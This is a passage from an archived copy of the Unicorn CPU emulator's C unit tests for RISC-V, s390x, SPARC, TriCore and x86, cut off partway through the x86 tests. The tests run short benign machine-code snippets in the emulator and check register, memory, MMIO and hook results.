"\xb7\x12\x00\x00" "\x9b\x82\x02\x82" "\x73\x90\x02\x30" "\x37\x53\x01\x00" "\x73\x10\x13\x34" "\x73\x00\x20\x30"; /* li t0, 0x41414141 li t1, 0x16000 sw t0, 0(t1) nop */ char code_s[] = "\xb7\x42\x41\x41" "\x9b\x82\x12\x14" "\x37\x63\x01\x00" "\x23\x20\x53\x00" "\x13\x00\x00\x00"; OK(uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc)); OK(uc_ctl_tlb_mode(uc, UC_TLB_CPU)); OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_riscv_mmu_hook_code, NULL, 1, 0)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_map(uc, code_address, 0x1000, UC_PROT_ALL)); OK(uc_mem_map(uc, data_address, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, code_address, &code_s, sizeof(code_s))); OK(uc_mem_write(uc, 0x1000, &code_m, sizeof(code_m))); test_riscv_mmu_prepare_tlb(uc, data_address, code_address); OK(uc_emu_start(uc, 0x1000, sizeof(code_m) - 1, 0, 0)); OK(uc_mem_read(uc, data_address, &data_result, sizeof(data_result))); TEST_CHECK(data_value == data_result); } TEST_LIST = { {"test_riscv32_nop", test_riscv32_nop}, {"test_riscv64_nop", test_riscv64_nop}, {"test_riscv32_3steps_pc_update", test_riscv32_3steps_pc_update}, {"test_riscv64_3steps_pc_update", test_riscv64_3steps_pc_update}, {"test_riscv32_until_pc_update", test_riscv32_until_pc_update}, {"test_riscv64_until_pc_update", test_riscv64_until_pc_update}, {"test_riscv32_fp_move", test_riscv32_fp_move}, {"test_riscv64_fp_move", test_riscv64_fp_move}, {"test_riscv64_fp_move_from_int", test_riscv64_fp_move_from_int}, {"test_riscv64_fp_move_from_int_reg_write", test_riscv64_fp_move_from_int_reg_write}, {"test_riscv64_fp_move_to_int", test_riscv64_fp_move_to_int}, {"test_riscv64_ecall", test_riscv64_ecall}, {"test_riscv32_mmio_map", test_riscv32_mmio_map}, {"test_riscv64_mmio_map", test_riscv64_mmio_map}, {"test_riscv32_map", test_riscv32_map}, {"test_riscv64_code_patching", test_riscv64_code_patching}, {"test_riscv64_code_patching_count", test_riscv64_code_patching_count}, {"test_riscv_correct_address_in_small_jump_hook", test_riscv_correct_address_in_small_jump_hook}, {"test_riscv_correct_address_in_long_jump_hook", test_riscv_correct_address_in_long_jump_hook}, {"test_riscv_mmu", test_riscv_mmu}, {NULL, NULL}}; ���������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_s390x.c���������������������������������������������������������������0000664�0000000�0000000�00000002006�14675241067�0017414�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_s390x_lr(void) { char code[] = "\x18\x23"; // lr %r2, %r3 uint64_t r_pc, r_r2, r_r3 = 0x114514; uc_engine *uc; uc_common_setup(&uc, UC_ARCH_S390X, UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_S390X_REG_R3, &r_r3)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_S390X_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_S390X_REG_PC, &r_pc)); TEST_CHECK(r_r2 == 0x114514); TEST_CHECK(r_pc == code_start + sizeof(code) - 1); OK(uc_close(uc)); } TEST_LIST = {{"test_s390x_lr", test_s390x_lr}, {NULL, NULL}}; ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_sparc.c���������������������������������������������������������������0000664�0000000�0000000�00000000175�14675241067�0017643�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; TEST_LIST = {{NULL, NULL}};���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_tricore.c�������������������������������������������������������������0000664�0000000�0000000�00000000176�14675241067�0020203�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; TEST_LIST = {{NULL, NULL}}; ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_x86.c�����������������������������������������������������������������0000664�0000000�0000000�00000160734�14675241067�0017170�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; #define MEM_BASE 0x40000000 #define MEM_SIZE 1024 * 1024 #define MEM_STACK MEM_BASE + (MEM_SIZE / 2) #define MEM_TEXT MEM_STACK + 4096 static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } typedef struct RegInfo_t { const char *file; int line; const char *name; uc_x86_reg reg; uint64_t value; } RegInfo; typedef struct QuickTest_t { uc_mode mode; uint8_t *code_data; size_t code_size; size_t in_count; RegInfo in_regs[32]; size_t out_count; RegInfo out_regs[32]; } QuickTest; static void QuickTest_run(QuickTest *test) { uc_engine *uc; // initialize emulator in X86-64bit mode OK(uc_open(UC_ARCH_X86, test->mode, &uc)); // map 1MB of memory for this emulation OK(uc_mem_map(uc, MEM_BASE, MEM_SIZE, UC_PROT_ALL)); OK(uc_mem_write(uc, MEM_TEXT, test->code_data, test->code_size)); if (test->mode == UC_MODE_64) { uint64_t stack_top = MEM_STACK; OK(uc_reg_write(uc, UC_X86_REG_RSP, &stack_top)); } else { uint32_t stack_top = MEM_STACK; OK(uc_reg_write(uc, UC_X86_REG_ESP, &stack_top)); } for (size_t i = 0; i < test->in_count; i++) { OK(uc_reg_write(uc, test->in_regs[i].reg, &test->in_regs[i].value)); } OK(uc_emu_start(uc, MEM_TEXT, MEM_TEXT + test->code_size, 0, 0)); for (size_t i = 0; i < test->out_count; i++) { RegInfo *out = &test->out_regs[i]; if (test->mode == UC_MODE_64) { uint64_t value = 0; OK(uc_reg_read(uc, out->reg, &value)); acutest_check_(value == out->value, out->file, out->line, "OUT_REG(%s, 0x%llX) = 0x%llX", out->name, out->value, value); } else { uint32_t value = 0; OK(uc_reg_read(uc, out->reg, &value)); acutest_check_(value == (uint32_t)out->value, out->file, out->line, "OUT_REG(%s, 0x%X) = 0x%X", out->name, (uint32_t)out->value, value); } } OK(uc_mem_unmap(uc, MEM_BASE, MEM_SIZE)); OK(uc_close(uc)); } #define TEST_CODE(MODE, CODE) \ QuickTest t; \ memset(&t, 0, sizeof(t)); \ t.mode = MODE; \ t.code_data = CODE; \ t.code_size = sizeof(CODE) #define TEST_IN_REG(NAME, VALUE) \ t.in_regs[t.in_count].file = __FILE__; \ t.in_regs[t.in_count].line = __LINE__; \ t.in_regs[t.in_count].name = #NAME; \ t.in_regs[t.in_count].reg = UC_X86_REG_##NAME; \ t.in_regs[t.in_count].value = VALUE; \ t.in_count++ #define TEST_OUT_REG(NAME, VALUE) \ t.out_regs[t.out_count].file = __FILE__; \ t.out_regs[t.out_count].line = __LINE__; \ t.out_regs[t.out_count].name = #NAME; \ t.out_regs[t.out_count].reg = UC_X86_REG_##NAME; \ t.out_regs[t.out_count].value = VALUE; \ t.out_count++ #define TEST_RUN() QuickTest_run(&t) typedef struct _INSN_IN_RESULT { uint32_t port; int size; } INSN_IN_RESULT; static void test_x86_in_callback(uc_engine *uc, uint32_t port, int size, void *user_data) { INSN_IN_RESULT *result = (INSN_IN_RESULT *)user_data; result->port = port; result->size = size; } static void test_x86_in(void) { uc_engine *uc; uc_hook hook; char code[] = "\xe5\x10"; // IN eax, 0x10 INSN_IN_RESULT result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_INSN, test_x86_in_callback, &result, 1, 0, UC_X86_INS_IN)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(result.port == 0x10); TEST_CHECK(result.size == 4); OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } typedef struct _INSN_OUT_RESULT { uint32_t port; int size; uint32_t value; } INSN_OUT_RESULT; static void test_x86_out_callback(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { INSN_OUT_RESULT *result = (INSN_OUT_RESULT *)user_data; result->port = port; result->size = size; result->value = value; } static void test_x86_out(void) { uc_engine *uc; uc_hook hook; char code[] = "\xb0\x32\xe6\x46"; // MOV al, 0x32; OUT 0x46, al; INSN_OUT_RESULT result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_INSN, test_x86_out_callback, &result, 1, 0, UC_X86_INS_OUT)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(result.port == 0x46); TEST_CHECK(result.size == 1); TEST_CHECK(result.value == 0x32); OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } typedef struct _MEM_HOOK_RESULT { uc_mem_type type; uint64_t address; int size; uint64_t value; } MEM_HOOK_RESULT; typedef struct _MEM_HOOK_RESULTS { uint64_t count; MEM_HOOK_RESULT results[16]; } MEM_HOOK_RESULTS; static bool test_x86_mem_hook_all_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { MEM_HOOK_RESULTS *r = (MEM_HOOK_RESULTS *)user_data; uint64_t count = r->count; if (count >= 16) { TEST_ASSERT(false); } r->results[count].type = type; r->results[count].address = address; r->results[count].size = size; r->results[count].value = value; r->count++; if (type == UC_MEM_READ_UNMAPPED) { uc_mem_map(uc, address, 0x1000, UC_PROT_ALL); } return true; } static void test_x86_mem_hook_all(void) { uc_engine *uc; uc_hook hook; // mov eax, 0xdeadbeef; // mov [0x8000], eax; // mov eax, [0x10000]; char code[] = "\xb8\xef\xbe\xad\xde\xa3\x00\x80\x00\x00\xa1\x00\x00\x01\x00"; MEM_HOOK_RESULTS r = {0}; MEM_HOOK_RESULT expects[3] = {{UC_MEM_WRITE, 0x8000, 4, 0xdeadbeef}, {UC_MEM_READ_UNMAPPED, 0x10000, 4, 0}, {UC_MEM_READ, 0x10000, 4, 0}}; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x8000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_VALID | UC_HOOK_MEM_INVALID, test_x86_mem_hook_all_callback, &r, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(r.count == 3); for (int i = 0; i < r.count; i++) { TEST_CHECK(expects[i].type == r.results[i].type); TEST_CHECK(expects[i].address == r.results[i].address); TEST_CHECK(expects[i].size == r.results[i].size); TEST_CHECK(expects[i].value == r.results[i].value); } OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } static void test_x86_inc_dec_pxor(void) { uc_engine *uc; char code[] = "\x41\x4a\x66\x0f\xef\xc1"; // INC ecx; DEC edx; PXOR xmm0, xmm1 int r_ecx = 0x1234; int r_edx = 0x7890; uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; uint64_t r_xmm1[2] = {0x8090a0b0c0d0e0f0, 0x0010203040506070}; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0)); OK(uc_reg_write(uc, UC_X86_REG_XMM1, &r_xmm1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); TEST_CHECK(r_xmm0[0] == 0x8899aabbccddeeff); TEST_CHECK(r_xmm0[1] == 0x0011223344556677); OK(uc_close(uc)); } static void test_x86_relative_jump(void) { uc_engine *uc; char code[] = "\xeb\x02\x90\x90\x90\x90\x90\x90"; // jmp 4; nop; nop; nop; // nop; nop; nop int r_eip; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); TEST_CHECK(r_eip == code_start + 4); OK(uc_close(uc)); } static void test_x86_loop(void) { uc_engine *uc; char code[] = "\x41\x4a\xeb\xfe"; // inc ecx; dec edx; jmp $; int r_ecx = 0x1234; int r_edx = 0x7890; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 1 * 1000000, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_invalid_mem_read(void) { uc_engine *uc; char code[] = "\x8b\x0d\xaa\xaa\xaa\xaa"; // mov ecx, [0xAAAAAAAA] uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_assert_err( UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_invalid_mem_write(void) { uc_engine *uc; char code[] = "\x89\x0d\xaa\xaa\xaa\xaa"; // mov ecx, [0xAAAAAAAA] uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_assert_err( UC_ERR_WRITE_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_invalid_jump(void) { uc_engine *uc; char code[] = "\xe9\xe9\xee\xee\xee"; // jmp 0xEEEEEEEE uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_64_syscall_callback(uc_engine *uc, void *user_data) { uint64_t rax; OK(uc_reg_read(uc, UC_X86_REG_RAX, &rax)); TEST_CHECK(rax == 0x100); } static void test_x86_64_syscall(void) { uc_engine *uc; uc_hook hook; char code[] = "\x0f\x05"; // syscall uint64_t r_rax = 0x100; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_hook_add(uc, &hook, UC_HOOK_INSN, test_x86_64_syscall_callback, NULL, 1, 0, UC_X86_INS_SYSCALL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } static void test_x86_16_add(void) { uc_engine *uc; char code[] = "\x00\x00"; // add byte ptr [bx + si], al uint16_t r_ax = 7; uint16_t r_bx = 5; uint16_t r_si = 6; uint8_t result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_16, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0, 0x1000, UC_PROT_ALL)); OK(uc_reg_write(uc, UC_X86_REG_AX, &r_ax)); OK(uc_reg_write(uc, UC_X86_REG_BX, &r_bx)); OK(uc_reg_write(uc, UC_X86_REG_SI, &r_si)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, r_bx + r_si, &result, 1)); TEST_CHECK(result == 7); OK(uc_close(uc)); } static void test_x86_reg_save(void) { uc_engine *uc; uc_context *ctx; char code[] = "\x40"; // inc eax int r_eax = 1; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); TEST_CHECK(r_eax == 2); OK(uc_context_restore(uc, ctx)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); TEST_CHECK(r_eax == 1); OK(uc_context_free(ctx)); OK(uc_close(uc)); } static bool test_x86_invalid_mem_read_stop_in_cb_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { // False indicates that we fail to handle this ERROR and let the emulation // stop. // // Note that the memory must be mapped properly if we return true! Check // test_x86_mem_hook_all for example. return false; } static void test_x86_invalid_mem_read_stop_in_cb(void) { uc_engine *uc; uc_hook hook; char code[] = "\x40\x8b\x1d\x00\x00\x10\x00\x42"; // inc eax; mov ebx, // [0x100000]; inc edx int r_eax = 0x1234; int r_edx = 0x5678; int r_eip = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_READ, test_x86_invalid_mem_read_stop_in_cb_callback, NULL, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); uc_assert_err( UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // The state of Unicorn should be correct at this time. OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_eip == code_start + 1); TEST_CHECK(r_eax == 0x1235); TEST_CHECK(r_edx == 0x5678); OK(uc_close(uc)); } static void test_x86_x87_fnstenv_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint32_t r_eip; uint32_t r_eax; uint32_t fnstenv[7]; if (address == code_start + 4) { // The first fnstenv executed // Save the address of the fld. OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); *((uint32_t *)user_data) = r_eip; OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_mem_read(uc, r_eax, fnstenv, sizeof(fnstenv))); // Don't update FCS:FIP for fnop. TEST_CHECK(fnstenv[3] == 0); } } static void test_x86_x87_fnstenv(void) { uc_engine *uc; uc_hook hook; char code[] = "\xd9\xd0\xd9\x30\xd9\x00\xd9\x30"; // fnop;fnstenv [eax];fld dword ptr // [eax];fnstenv [eax] uint32_t base = code_start + 3 * code_len; uint32_t last_eip; uint32_t fnstenv[7]; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, base, code_len, UC_PROT_ALL)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &base)); OK(uc_hook_add(uc, &hook, UC_HOOK_CODE, test_x86_x87_fnstenv_callback, &last_eip, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, base, fnstenv, sizeof(fnstenv))); // But update FCS:FIP for fld. TEST_CHECK(LEINT32(fnstenv[3]) == last_eip); OK(uc_close(uc)); } static uint64_t test_x86_mmio_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); return 0x19260817; } static void test_x86_mmio_write_callback(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); TEST_CHECK(value == 0xdeadbeef); return; } static void test_x86_mmio(void) { uc_engine *uc; int r_ecx = 0xdeadbeef; char code[] = "\x89\x0d\x04\x00\x02\x00\x8b\x0d\x04\x00\x02\x00"; // mov [0x20004], // ecx; mov ecx, // [0x20004] uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_mmio_map(uc, 0x20000, 0x1000, test_x86_mmio_read_callback, NULL, test_x86_mmio_write_callback, NULL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); TEST_CHECK(r_ecx == 0x19260817); OK(uc_close(uc)); } static bool test_x86_missing_code_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { char code[] = "\x41\x4a"; // inc ecx; dec edx; uint64_t algined_address = address & 0xFFFFFFFFFFFFF000ULL; int aligned_size = ((int)(size / 0x1000) + 1) * 0x1000; OK(uc_mem_map(uc, algined_address, aligned_size, UC_PROT_ALL)); OK(uc_mem_write(uc, algined_address, code, sizeof(code) - 1)); return true; } static void test_x86_missing_code(void) { uc_engine *uc; uc_hook hook; int r_ecx = 0x1234; int r_edx = 0x7890; // Don't write any code by design. OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_x86_missing_code_callback, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + 2, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_smc_xor(void) { uc_engine *uc; /* * 0x1000 xor dword ptr [edi+0x3], eax ; edi=0x1000, eax=0xbc4177e6 * 0x1003 dw 0x3ea98b13 */ char code[] = "\x31\x47\x03\x13\x8b\xa9\x3e"; int r_edi = code_start; int r_eax = 0xbc4177e6; uint32_t result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); OK(uc_emu_start(uc, code_start, code_start + 3, 0, 0)); OK(uc_mem_read(uc, code_start + 3, (void *)&result, 4)); TEST_CHECK(LEINT32(result) == (0x3ea98b13 ^ 0xbc4177e6)); OK(uc_close(uc)); } static uint64_t test_x86_mmio_uc_mem_rw_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { TEST_CHECK(offset == 8); TEST_CHECK(size == 4); return 0x19260817; } static void test_x86_mmio_uc_mem_rw_write_callback(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); TEST_CHECK(value == 0xdeadbeef); return; } static void test_x86_mmio_uc_mem_rw(void) { uc_engine *uc; int data = LEINT32(0xdeadbeef); OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mmio_map(uc, 0x20000, 0x1000, test_x86_mmio_uc_mem_rw_read_callback, NULL, test_x86_mmio_uc_mem_rw_write_callback, NULL)); OK(uc_mem_write(uc, 0x20004, (void *)&data, 4)); OK(uc_mem_read(uc, 0x20008, (void *)&data, 4)); TEST_CHECK(LEINT32(data) == 0x19260817); OK(uc_close(uc)); } static void test_x86_sysenter_hook(uc_engine *uc, void *user) { *(int *)user = 1; } static void test_x86_sysenter(void) { uc_engine *uc; char code[] = "\x0F\x34"; // sysenter uc_hook h; int called = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INSN, test_x86_sysenter_hook, &called, 1, 0, UC_X86_INS_SYSENTER)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(called == 1); OK(uc_close(uc)); } static int test_x86_hook_cpuid_callback(uc_engine *uc, void *data) { int reg = 7; OK(uc_reg_write(uc, UC_X86_REG_EAX, ®)); // Overwrite the cpuid instruction. return 1; } static void test_x86_hook_cpuid(void) { uc_engine *uc; char code[] = "\x40\x0F\xA2"; // INC EAX; CPUID uc_hook h; int reg; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INSN, test_x86_hook_cpuid_callback, NULL, 1, 0, UC_X86_INS_CPUID)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, ®)); TEST_CHECK(reg == 7); OK(uc_close(uc)); } static void test_x86_486_cpuid(void) { uc_engine *uc; uint32_t eax; uint32_t ebx; char code[] = {0x31, 0xC0, 0x0F, 0xA2}; // XOR EAX EAX; CPUID OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_X86_486)); OK(uc_mem_map(uc, 0, 4 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); OK(uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); /* Read eax after emulation */ OK(uc_reg_read(uc, UC_X86_REG_EAX, &eax)); OK(uc_reg_read(uc, UC_X86_REG_EBX, &ebx)); TEST_CHECK(eax != 0); TEST_CHECK(ebx == 0x756e6547); // magic string "Genu" for intel cpu OK(uc_close(uc)); } // This is a regression bug. static void test_x86_clear_tb_cache(void) { uc_engine *uc; char code[] = "\x83\xc1\x01\x4a"; // ADD ecx, 1; DEC edx; int r_ecx = 0x1234; int r_edx = 0x7890; uint64_t code_start = 0x1240; // Choose this address by design uint64_t code_len = 0x1000; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, code_start & (1 << 12), code_len, UC_PROT_ALL)); OK(uc_mem_write(uc, code_start, code, sizeof(code))); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // This emulation should take no effect at all. OK(uc_emu_start(uc, code_start, code_start, 0, 0)); // Emulate ADD ecx, 1. OK(uc_emu_start(uc, code_start, code_start + 3, 0, 0)); // If tb cache is not cleared, edx would be still 0x7890 OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1236); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_clear_count_cache(void) { uc_engine *uc; // uc_emu_start will clear last TB when exiting so generating a tb at last // by design char code[] = "\x83\xc1\x01\x4a\xeb\x00\x83\xc3\x01"; // ADD ecx, 1; DEC edx; // jmp t; // t: // ADD ebx, 1 int r_ecx = 0x1234; int r_edx = 0x7890; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 2)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1236); TEST_CHECK(r_edx == 0x788e); OK(uc_close(uc)); } // This is a regression bug. static void test_x86_clear_empty_tb(void) { uc_engine *uc; // lb: // add ecx, 1; // cmp ecx, 0; // jz lb; // dec edx; char code[] = "\x83\xc1\x01\x83\xf9\x00\x74\xf8\x4a"; int r_edx = 0x7890; uint64_t code_start = 0x1240; // Choose this address by design uint64_t code_len = 0x1000; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, code_start & (1 << 12), code_len, UC_PROT_ALL)); OK(uc_mem_write(uc, code_start, code, sizeof(code))); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // Make sure we generate an empty tb at the exit address by stopping at dec // edx. OK(uc_emu_start(uc, code_start, code_start + 8, 0, 0)); // If tb cache is not cleared, edx would be still 0x7890 